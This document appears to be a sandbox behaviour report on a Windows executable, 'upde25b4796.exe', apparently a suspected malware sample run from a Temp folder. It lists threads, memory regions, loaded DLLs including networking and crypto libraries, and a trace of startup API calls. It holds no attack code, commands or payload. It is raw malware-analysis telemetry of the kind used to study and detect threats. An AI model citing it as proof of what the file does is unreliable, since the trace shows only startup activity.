Thread: id = 345 os_tid = 0x1c0 Thread: id = 346 os_tid = 0x608 Thread: id = 347 os_tid = 0x7dc Thread: id = 348 os_tid = 0x758 Thread: id = 375 os_tid = 0x5c4 Thread: id = 376 os_tid = 0x79c Thread: id = 384 os_tid = 0x618 Thread: id = 385 os_tid = 0x778 Thread: id = 388 os_tid = 0x3b4 Thread: id = 411 os_tid = 0x42c Thread: id = 420 os_tid = 0x514 Thread: id = 421 os_tid = 0x538 Thread: id = 430 os_tid = 0x618 Thread: id = 431 os_tid = 0x5c4 Thread: id = 432 os_tid = 0x79c Thread: id = 435 os_tid = 0x240 Process: id = "20" image_name = "upde25b4796.exe" filename = "c:\\users\\aetadzjz\\appdata\\local\\temp\\upde25b4796.exe" page_root = "0x63f49000" os_pid = "0x594" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "16" os_parent_pid = "0x320" cmd_line = "\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\upde25b4796.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "YKYD69Q\\aETAdzjz" os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f83e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3565 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 3566 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 3567 start_va = 0x40000 end_va = 0x40fff entry_point = 0x40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 3568 start_va = 0x50000 end_va = 0x8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 3569 start_va = 0x90000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 3570 start_va = 0x190000 end_va = 0x193fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 3571 start_va = 0x400000 end_va = 0x432fff entry_point = 0x400000 region_type = mapped_file name = "upde25b4796.exe" filename = "\\Users\\aETAdzjz\\AppData\\Local\\Temp\\upde25b4796.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\upde25b4796.exe") Region: id = 3572 start_va = 0x77ad0000 end_va = 0x77c78fff entry_point = 0x77ad0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3573 start_va = 0x77cb0000 end_va = 0x77e2ffff entry_point = 0x77cb0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 3574 start_va = 0x7efb0000 end_va = 0x7efd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 3575 start_va = 0x7efdb000 end_va = 0x7efddfff entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 3576 start_va = 0x7efde000 end_va = 0x7efdefff entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 3577 start_va = 0x7efdf000 end_va = 0x7efdffff entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 3578 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 3579 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3580 start_va = 0x7fff0000 end_va = 0x7fffffeffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 3581 start_va = 0x250000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = "private_0x0000000000250000" filename = "" Region: id = 3582 start_va = 0x743d0000 end_va = 0x743d7fff entry_point = 0x743d0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 3583 start_va = 0x743e0000 end_va = 0x7443bfff entry_point = 0x743e0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 3584 start_va = 0x74440000 end_va = 0x7447efff entry_point = 0x74440000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 3585 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 3586 start_va = 0x1a0000 end_va = 0x206fff entry_point = 0x1a0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3587 start_va = 0x3c0000 end_va = 0x3cffff entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 3588 start_va = 0x4f0000 end_va = 0x5effff entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 3589 start_va = 0x72940000 end_va = 0x72a92fff entry_point = 0x72940000 region_type = mapped_file name = "msvbvm60.dll" filename = "\\Windows\\SysWOW64\\msvbvm60.dll" (normalized: "c:\\windows\\syswow64\\msvbvm60.dll") Region: id = 3590 start_va = 0x75800000 end_va = 0x7580bfff entry_point = 0x75800000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 3591 start_va = 0x75810000 end_va = 0x7586ffff entry_point = 0x75810000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 3592 start_va = 0x758c0000 end_va = 0x759bffff entry_point = 0x758c0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 3593 start_va = 0x759c0000 end_va = 0x75acffff entry_point = 0x759c0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3594 start_va = 0x75ae0000 end_va = 0x75c3bfff entry_point = 0x75ae0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 3595 start_va = 0x75e70000 end_va = 0x75f1bfff entry_point = 0x75e70000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 3596 start_va = 0x76110000 end_va = 0x761acfff entry_point = 0x76110000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 3597 start_va = 0x761b0000 end_va = 0x7623efff entry_point = 0x761b0000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 3598 start_va = 0x76640000 end_va = 0x76685fff entry_point = 0x76640000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 3599 start_va = 0x767d0000 end_va = 0x767e8fff entry_point = 0x767d0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 3600 start_va = 0x76800000 end_va = 0x768effff entry_point = 0x76800000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 3601 start_va = 0x768f0000 end_va = 0x768f9fff entry_point = 0x768f0000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 3602 start_va = 0x76950000 end_va = 0x769dffff entry_point = 0x76950000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 3603 start_va = 0x77740000 end_va = 0x777dffff entry_point = 0x77740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 3604 start_va = 0x778b0000 end_va = 0x779a9fff entry_point = 0x0 region_type = private name = "private_0x00000000778b0000" filename = "" Region: id = 3605 start_va = 0x779b0000 end_va = 0x77acefff entry_point = 0x0 region_type = private name = "private_0x00000000779b0000" filename = "" Region: id = 3606 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 3607 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 3608 start_va = 0x5f0000 end_va = 0x777fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005f0000" filename = "" Region: id = 3609 start_va = 0x760b0000 end_va = 0x7610ffff entry_point = 0x760b0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 3610 start_va = 0x76570000 end_va = 0x7663bfff entry_point = 0x76570000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 3611 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3612 start_va = 0x30000 end_va = 0x30fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 3613 start_va = 0x780000 end_va = 0x900fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000780000" filename = "" Region: id = 3614 start_va = 0x910000 end_va = 0x1d0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000910000" filename = "" Region: id = 3615 start_va = 0x1d10000 end_va = 0x1ebffff entry_point = 0x0 region_type = private name = "private_0x0000000001d10000" filename = "" Region: id = 3616 start_va = 0x1ec0000 end_va = 0x22bffff entry_point = 0x0 region_type = private name = "private_0x0000000001ec0000" filename = "" Region: id = 3617 start_va = 0x22c0000 end_va = 0x258efff entry_point = 0x22c0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 3618 start_va = 0x1d10000 end_va = 0x1e2ffff entry_point = 0x0 region_type = private name = "private_0x0000000001d10000" filename = "" Region: id = 3619 start_va = 0x1eb0000 end_va = 0x1ebffff entry_point = 0x0 region_type = private name = "private_0x0000000001eb0000" filename = "" Region: id = 3620 start_va = 0x2590000 end_va = 0x270ffff entry_point = 0x0 region_type = private name = "private_0x0000000002590000" filename = "" Region: id = 3621 start_va = 0x741b0000 end_va = 0x7422ffff entry_point = 0x741b0000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 3622 start_va = 0x2710000 end_va = 0x28fffff entry_point = 0x0 region_type = private name = "private_0x0000000002710000" filename = "" Region: id = 3623 start_va = 0x2d0000 end_va = 0x3aefff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002d0000" filename = "" Region: id = 3624 start_va = 0x2590000 end_va = 0x26affff entry_point = 0x0 region_type = private name = "private_0x0000000002590000" filename = "" Region: id = 3625 start_va = 0x26d0000 end_va = 0x270ffff entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 3626 start_va = 0x210000 end_va = 0x21ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 3627 start_va = 0x74e30000 end_va = 0x74e8efff entry_point = 0x74e30000 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\SysWOW64\\sxs.dll" (normalized: "c:\\windows\\syswow64\\sxs.dll") Region: id = 3628 start_va = 0x74130000 end_va = 0x74142fff entry_point = 0x74130000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 3629 start_va = 0x220000 end_va = 0x226fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000220000" filename = "" Region: id = 3630 start_va = 0x230000 end_va = 0x231fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 3631 start_va = 0x2900000 end_va = 0x2cf2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002900000" filename = "" Region: id = 3632 start_va = 0x2d00000 end_va = 0x362ffff entry_point = 0x2d00000 region_type = mapped_file name = "staticcache.dat" filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat") Region: id = 3633 start_va = 0x440000 end_va = 0x4bffff entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 3634 start_va = 0x76a70000 end_va = 0x776b9fff entry_point = 0x76a70000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 3635 start_va = 0x76370000 end_va = 0x763c6fff entry_point = 0x76370000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 3727 start_va = 0x756b0000 end_va = 0x756cbfff entry_point = 0x756b0000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 3728 start_va = 0x767f0000 end_va = 0x767f5fff entry_point = 0x767f0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 3729 start_va = 0x756e0000 end_va = 0x756e6fff entry_point = 0x756e0000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll") Region: id = 3730 start_va = 0x240000 end_va = 0x247fff entry_point = 0x0 region_type = private name = "private_0x0000000000240000" filename = "" Region: id = 3731 start_va = 0x74fd0000 end_va = 0x74fe1fff entry_point = 0x74fd0000 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\SysWOW64\\dhcpcsvc.dll" (normalized: "c:\\windows\\syswow64\\dhcpcsvc.dll") Region: id = 3732 start_va = 0x777e0000 end_va = 0x77814fff entry_point = 0x777e0000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 3733 start_va = 0x2710000 end_va = 0x288ffff entry_point = 0x0 region_type = private name = "private_0x0000000002710000" filename = "" Region: id = 3734 start_va = 0x28c0000 end_va = 0x28fffff entry_point = 0x0 region_type = private name = "private_0x00000000028c0000" filename = "" Region: id = 3735 start_va = 0x1d10000 end_va = 0x1d4ffff entry_point = 0x0 region_type = private name = "private_0x0000000001d10000" filename = "" Region: id = 3736 start_va = 0x1df0000 end_va = 0x1e2ffff entry_point = 0x0 region_type = private name = "private_0x0000000001df0000" filename = "" Region: id = 3737 start_va = 0x2590000 end_va = 0x268ffff entry_point = 0x0 region_type = private name = "private_0x0000000002590000" filename = "" Region: id = 3738 start_va = 0x26a0000 end_va = 0x26affff entry_point = 0x0 region_type = private name = "private_0x00000000026a0000" filename = "" Region: id = 3739 start_va = 0x7efd8000 end_va = 0x7efdafff entry_point = 0x0 region_type = private name = "private_0x000000007efd8000" filename = "" Region: id = 3740 start_va = 0x3630000 end_va = 0xb62ffff entry_point = 0x0 region_type = private name = "private_0x0000000003630000" filename = "" Region: id = 3741 start_va = 0x400000 end_va = 0x41bfff entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3742 start_va = 0x76240000 end_va = 0x7635cfff entry_point = 0x76240000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll") Region: id = 3743 start_va = 0x76360000 end_va = 0x7636bfff entry_point = 0x76360000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\SysWOW64\\msasn1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll") Region: id = 3744 start_va = 0x75ad0000 end_va = 0x75ad4fff entry_point = 0x75ad0000 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\SysWOW64\\psapi.dll" (normalized: "c:\\windows\\syswow64\\psapi.dll") Region: id = 3745 start_va = 0x75f20000 end_va = 0x76014fff entry_point = 0x75f20000 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\SysWOW64\\wininet.dll" (normalized: "c:\\windows\\syswow64\\wininet.dll") Region: id = 3746 start_va = 0x76690000 end_va = 0x767c5fff entry_point = 0x76690000 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\SysWOW64\\urlmon.dll" (normalized: "c:\\windows\\syswow64\\urlmon.dll") Region: id = 3747 start_va = 0x75c40000 end_va = 0x75e3afff entry_point = 0x75c40000 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\SysWOW64\\iertutil.dll" (normalized: "c:\\windows\\syswow64\\iertutil.dll") Region: id = 3748 start_va = 0x75690000 end_va = 0x75697fff entry_point = 0x75690000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\SysWOW64\\secur32.dll" (normalized: "c:\\windows\\syswow64\\secur32.dll") Region: id = 3749 start_va = 0x2710000 end_va = 0x27dffff entry_point = 0x0 region_type = private name = "private_0x0000000002710000" filename = "" Region: id = 3750 start_va = 0x2850000 end_va = 0x288ffff entry_point = 0x0 region_type = private name = "private_0x0000000002850000" filename = "" Region: id = 3751 start_va = 0x75670000 end_va = 0x75685fff entry_point = 0x75670000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 3752 start_va = 0x1d50000 end_va = 0x1d8bfff entry_point = 0x1d50000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 3753 start_va = 0x1d50000 end_va = 0x1d8bfff entry_point = 0x1d50000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 3754 start_va = 0x1d50000 end_va = 0x1d8bfff entry_point = 0x1d50000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 3755 start_va = 0x1d50000 end_va = 0x1d8bfff entry_point = 0x1d50000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 3756 start_va = 0x1d50000 end_va = 0x1d8bfff entry_point = 0x1d50000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 3757 start_va = 0x75630000 end_va = 0x7566afff entry_point = 0x75630000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 3758 start_va = 0x3b0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 3759 start_va = 0x3d0000 end_va = 0x3fffff entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Thread: id = 298 os_tid = 0x548 [0318.090] GetVersion () returned 0x1db10106 [0318.090] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x759c0000 [0318.090] GetProcAddress (hModule=0x759c0000, lpProcName="IsTNT") returned 0x0 [0318.091] VirtualAlloc (lpAddress=0x0, dwSize=0x400000, flAllocationType=0x2000, flProtect=0x4) returned 0x1ec0000 [0318.091] VirtualAlloc (lpAddress=0x1ec0000, dwSize=0x10000, flAllocationType=0x1000, flProtect=0x4) returned 0x1ec0000 [0318.091] GetCurrentThreadId () returned 0x548 [0318.092] GetCommandLineA () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\upde25b4796.exe\"" [0318.092] GetEnvironmentStringsW () returned 0x5047e8* [0318.092] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=::=::\\", cchWideChar=1379, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1379 [0318.092] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=::=::\\", cchWideChar=1379, lpMultiByteStr=0x1eb07d0, cbMultiByte=1379, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=::=::\\", lpUsedDefaultChar=0x0) returned 1379 [0318.092] FreeEnvironmentStringsW (penv=0x5047e8) returned 1 [0318.092] GetStartupInfoA (in: lpStartupInfo=0x18f9b8 | out: lpStartupInfo=0x18f9b8*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\upde25b4796.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0318.092] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0318.092] GetFileType (hFile=0x0) returned 0x0 [0318.092] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0318.092] GetFileType (hFile=0x0) returned 0x0 [0318.092] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0318.092] GetFileType (hFile=0x0) returned 0x0 [0318.092] SetHandleCount (uNumber=0x20) returned 0x20 [0318.092] GetACP () returned 0x4e4 [0318.092] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f9e0 | out: lpCPInfo=0x18f9e0) returned 1 [0318.092] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72a4c528, nSize=0x104 | out: lpFilename="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\upde25b4796.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\upde25b4796.exe")) returned 0x34 [0318.093] GetModuleHandleA (lpModuleName="KERNEL32") returned 0x759c0000 [0318.093] GetProcAddress (hModule=0x759c0000, lpProcName="IsProcessorFeaturePresent") returned 0x759d5235 [0318.093] IsProcessorFeaturePresent (ProcessorFeature=0x0) returned 0 [0318.093] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x7c [0318.093] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x80 [0318.094] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0318.094] GetModuleFileNameA (in: hModule=0x72940000, lpFilename=0x72a4e6c8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\MSVBVM60.DLL" (normalized: "c:\\windows\\system32\\msvbvm60.dll")) returned 0x20 [0318.094] GetVersion () returned 0x1db10106 [0318.094] lstrcmpiW (lpString1="A", lpString2="B") returned -1 [0318.095] GetUserDefaultLCID () returned 0x409 [0318.095] CompareStringW (Locale=0x409, dwCmpFlags=0x30001, lpString1="A", cchCount1=-1, lpString2="B", cchCount2=-1) returned 1 [0318.095] GetSystemMetrics (nIndex=5) returned 1 [0318.095] GetSystemMetrics (nIndex=6) returned 1 [0318.095] GetSystemMetrics (nIndex=11) returned 32 [0318.095] GetSystemMetrics (nIndex=12) returned 32 [0318.095] GetSystemMetrics (nIndex=34) returned 132 [0318.095] GetSystemMetrics (nIndex=35) returned 38 [0318.095] GetSystemMetrics (nIndex=0) returned 1440 [0318.095] GetSystemMetrics (nIndex=1) returned 900 [0318.095] GetSystemMetrics (nIndex=32) returned 8 [0318.095] GetSystemMetrics (nIndex=33) returned 8 [0318.095] GetSystemMetrics (nIndex=42) returned 0 [0318.095] GetStockObject (i=15) returned 0x188000b [0318.095] GetStockObject (i=7) returned 0x1b00017 [0318.095] GetStockObject (i=6) returned 0x1b00018 [0318.095] GetStockObject (i=8) returned 0x1b00016 [0318.095] GetStockObject (i=4) returned 0x1900011 [0318.095] GetStockObject (i=2) returned 0x1900012 [0318.095] GetStockObject (i=0) returned 0x1900010 [0318.095] GetStockObject (i=5) returned 0x1900015 [0318.095] GetStockObject (i=13) returned 0x18a002e [0318.095] GetDC (hWnd=0x0) returned 0x7010156 [0318.095] GetTextExtentPointA (in: hdc=0x7010156, lpString="0", c=1, lpsz=0x18f9dc | out: lpsz=0x18f9dc) returned 1 [0318.096] GetDeviceCaps (hdc=0x7010156, index=14) returned 1 [0318.096] GetDeviceCaps (hdc=0x7010156, index=12) returned 32 [0318.096] GetDeviceCaps (hdc=0x7010156, index=88) returned 96 [0318.096] GetDeviceCaps (hdc=0x7010156, index=90) returned 96 [0318.096] GetDeviceCaps (hdc=0x7010156, index=38) returned 32409 [0318.096] ReleaseDC (hWnd=0x0, hDC=0x7010156) returned 1 [0318.097] CoGetMalloc (in: dwMemContext=0x1, ppMalloc=0x72a4e7d0 | out: ppMalloc=0x72a4e7d0*=0x75c266bc) returned 0x0 [0318.097] GetCurrentThreadId () returned 0x548 [0318.097] GetStartupInfoA (in: lpStartupInfo=0x18ff20 | out: lpStartupInfo=0x18ff20*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\upde25b4796.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0318.097] GetCurrentThreadId () returned 0x548 [0318.097] GetCurrentThreadId () returned 0x548 [0318.097] GetCommandLineA () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\upde25b4796.exe\"" [0318.097] lstrlenA (lpString="") returned 0 [0318.097] lstrcpyA (in: lpString1=0x18feac, lpString2="" | out: lpString1="") returned="" [0318.097] SetErrorMode (uMode=0x8001) returned 0x0 [0318.097] GetModuleFileNameA (in: hModule=0x72940000, lpFilename=0x18fb68, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\MSVBVM60.DLL" (normalized: "c:\\windows\\system32\\msvbvm60.dll")) returned 0x20 [0318.097] GetUserDefaultLCID () returned 0x409 [0318.097] lstrcpyA (in: lpString1=0x18f868, lpString2="*" | out: lpString1="*") returned="*" [0318.097] LoadStringA (in: hInstance=0x72940000, uID=0x7d1, lpBuffer=0x18fc6c, cchBufferMax=8 | out: lpBuffer="409") returned 0x3 [0318.097] GetSystemDefaultLCID () returned 0x409 [0318.098] GetUserDefaultLCID () returned 0x409 [0318.098] GetLocaleInfoA (in: Locale=0x400, LCType=0xe, lpLCData=0x18fc76, cchData=2 | out: lpLCData=".") returned 2 [0318.098] GetStockObject (i=13) returned 0x18a002e [0318.098] GetObjectA (in: h=0x18a002e, c=60, pv=0x18fc3c | out: pv=0x18fc3c) returned 60 [0318.098] GetLocaleInfoA (in: Locale=0x409, LCType=0x80000003, lpLCData=0x18fc38, cchData=4 | out: lpLCData="ENU") returned 4 [0318.098] lstrcpyA (in: lpString1=0x18fc68, lpString2="EN" | out: lpString1="EN") returned="EN" [0318.098] lstrlenA (lpString="{xx}") returned 4 [0318.098] lstrlenA (lpString="VB98.CHM") returned 8 [0318.098] lstrcpyA (in: lpString1=0x72a4eae8, lpString2="VB98.CHM" | out: lpString1="VB98.CHM") returned="VB98.CHM" [0318.098] GetLocaleInfoA (in: Locale=0x409, LCType=0x80000003, lpLCData=0x18fc38, cchData=4 | out: lpLCData="ENU") returned 4 [0318.098] lstrcpyA (in: lpString1=0x18fc68, lpString2="EN" | out: lpString1="EN") returned="EN" [0318.098] lstrlenA (lpString="{xx}") returned 4 [0318.098] lstrlenA (lpString="VBENLR98.CHM") returned 12 